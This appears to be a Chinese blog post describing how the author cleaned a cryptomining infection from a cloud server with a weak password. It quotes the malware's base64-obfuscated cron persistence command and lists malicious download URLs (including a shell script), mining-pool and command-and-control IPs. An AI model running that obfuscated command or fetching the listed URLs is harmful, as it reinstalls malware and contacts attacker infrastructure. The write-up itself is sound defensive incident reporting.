個人第一臺阿里雲付費服務器被挖礦木馬攻陷的補救措施

以前玩過騰訊，阿里，華爲的免費服務器，都是又卡又慢，身爲22世紀祖國的花朵，經過知識付費的薰陶，我義無反顧的終止了我的白嫖行爲，然而努力讓自己變得更好的路上總是有各種坑。。。。

服務器背景：

操作環境背景：

操作系統：Windows 10

操作工具：xshell（Free for Home/school）

故事背景：

拿到服務器後，自己創建了一個普通用戶：shaun ；密碼：123456   

（我承認我懶，所以設了這個連號密碼，但這個該死的挖礦程序把我心態搞炸了，他要是不搞我的程序，讓我還能玩，我都懶得搞他，但是我搭建的程序都GG了，所以不得不花費一天時間來記錄一下，菜雞的垂死掙扎全過程）

一個多月都是用普通用戶在瞎搗鼓，有一天習慣的ssh登錄，然而不幸的事情發生了，一直登陸不上。（後來證明還有Apache Solr Velocity模板注入問題）

（當時沒截圖，以下圖片都是後來的）

解決方法：

根據菜雞生存手冊第一條：百度一下，你就知道。

雖然沒解決但是提供了點思路，使用root成功登陸服務器，

發現些許貓膩

 

甜蜜的！這臺服務器上什麼都沒有運行，跑這些幹啥玩意捏，經過簡單的kill 命令，發現殺不完。

看了一下定時任務果然：（當時沒截圖，以下圖片都是後來的）

 

定時任務的腳本：

/bin/sh -c echo -n "KCB3aGlsZSA6IDsgZG8gc2xlZXAgNSA7IGlmICEga2lsbCAtMCA5MjI2ID4vZGV2L251bGwgMj4mMSA7IHRoZW4gL2hvbWUvc2hhdW4vYnZ4Y3Z3ID4vZGV2L251bGwgMj4mMSA7IGZpIDsgZG9uZSApICYgcGlkPSQhIDsgKHNsZWVwIDEwICYmIGtpbGwgLTkgJHBpZCkgJg==" | base64 -d | sh >/dev/null 2>&1

while 循環！這是每一個小時不留痕跡的循環搞事情呀。。。

 

此時已經知道中了挖礦木馬病毒，甜蜜的，這種級別的已經不是我這種菜雞可以解決的了，登錄阿里雲官網看了一下，

因爲窮所以沒有快照，有錢的小夥伴一定要搞個快照，但是也要小心，別把病毒也快照進去了。

最偷懶的解決發法：重裝系統(想要根除病毒太難了，初始化一下就完事了)，無非就是數據的問題，不怕直接重裝；

阿里雲官方教程：https://help.aliyun.com/document_detail/25449.html

初始化30分鐘都不到；重新安裝java，mysql，應用程序，恢復數據等，最重要的是重新設置了超複雜密碼，以上問題解決一共花費清明節三天時間，反正受疫情影響，也出不去，只能這樣安慰自己。

 

shaun：挖礦木馬程序，你沒想到吧，解決你只要幾分鐘，格式化一下就好了

 

以上全部內容，此致敬禮! （大佬們看到這裏就可以了，這也是官方推薦的解決方法，下面的是菜雞的左右互搏苦苦掙扎。）

 

 

 

再一天後，又是習慣的ssh登錄，還是原來的配方，還是熟悉的味道，加夕。。。。（跑題了）

解決方法：

根據菜雞生存手冊第一條：百度一下，你京

挖礦木馬：你沒想到吧，我又回來了！

shaun：我去年買了個表！

人生不如意，十有八九。本以爲逃過一劫，

好吧，這輩子勞碌的命。。。

1.root登錄

2.查看指定用戶是否有定時任務：

crontab -l -u shaun

3.刪除此用戶的定時任務：

crontab -r -u  shaun

4.查看此用戶的定時任務文件：

cd /var/spool/cron/

5.通過 ll  找到 shaun的定時任務文件，直接 rm -rf shaun

6.因爲神祕力量，所以會不停的創建shaun 的定時任務，你刪了，過會又出來了。所以此時我們要走病毒的路，讓他無路可走。

    根據Linux下一切都是文件，一個目錄歸根到底還是一個文件，所以同一目錄內文件和目錄不能同名！

    個人操作：所以創建一個目錄 名爲shaun，讓他沒有辦法創建名爲shaun的定時任務文件。

7.在次查看指定用戶是否有定時任務：

crontab -l -u shaun

 

8.在來一套七傷拳打發，檢測cron定時服務是否自啓用：

systemctl is-enabled crond.service

 結果展示如下：

 enable表示已啓用自啓動
 disable標識未啓用自啓動

 

9.如果已經啓用，關閉cron自啓動:

systemctl disable crond.service

 

10.停止cron服務[命令沒有提示]:

systemctl stop crond.service

 

11.查看cron服務的啓動狀態:

systemctl status crond.service

[只有cron的狀態是active  running的，才表示cron服務是啓動的]

 

12.至此定時任務，應該停止了。可以查看一下有哪些正在運行的進程，kill掉不正常的就OK了。

ps -ef |grep shaun

 

13.修改 shaun 用戶的登錄密碼

passwd shaun

 

14.重新試了一下shaun 登錄，可以登陸了。灰常開心，終於不要初始化了。

 

應該找售後解決問題，我不能搶人家飯碗呀。

 

 

總結：養成備份的好習慣，最好使用快照備份，就是注意別把病毒也備份進去。

          像我一樣如果就是想玩玩，可以自己先和病毒玩玩，自認爲技術過關，病毒查殺乾乾淨淨了，可以不用初始化。

                  如果和我一樣是小白那最後還是初始化（格式化），此方法最麻煩的就是如何恢復數據了。

 

在此感謝這三個網站提供的思路：

https://www.w3xue.com/exp/article/20199/53730.html

https://zhuanlan.zhihu.com/p/85731835

https://www.cnblogs.com/hack404/p/11464890.html

 

 

 

Tips:要想生活過得去，所有檢查都得綠。

 

 

 

 1.貼出惡意下載源（我已經把這個ip，不論入站還是出站都拒絕訪問了）

      （千萬別點，會自動下載一個東東到你的電腦，我沒研究）：http://82.146.36.205/sites/default/files/maps   

     

 

2.貼出礦池IP：157.245.228.211 ；礦池端口：80

 

3.web攻擊， Apache Solr Velocity模板遠程命令執行漏洞

請求時間：2020-04-07 18:07:26

攻擊者IP：194.99.104.130

 

暫時修改建議：​ 限制互聯網用戶對solr admin的訪問!

 

 

其他 惡意IP很多，不管是不是肉雞，我是寧錯殺不放過。

高危鏈接：本人在此聲明，僅供學習參考，有任何問題，與本文，本人無關。

http://35.168.165.151/sites/default/files/maps

http://82.146.36.205/sites/default/files/maps

攻擊者IP：194.99.104.130

礦池IP：157.245.228.211

礦池IP：157.245.149.66

中控IP：134.209.81.199

中控IP：157.245.149.66

攻擊者IP：212.8.247.179

URL鏈接：http://217.12.221.244/s.sh

 

最後結束語：

與天鬥，與地鬥，與人鬥，其樂無窮！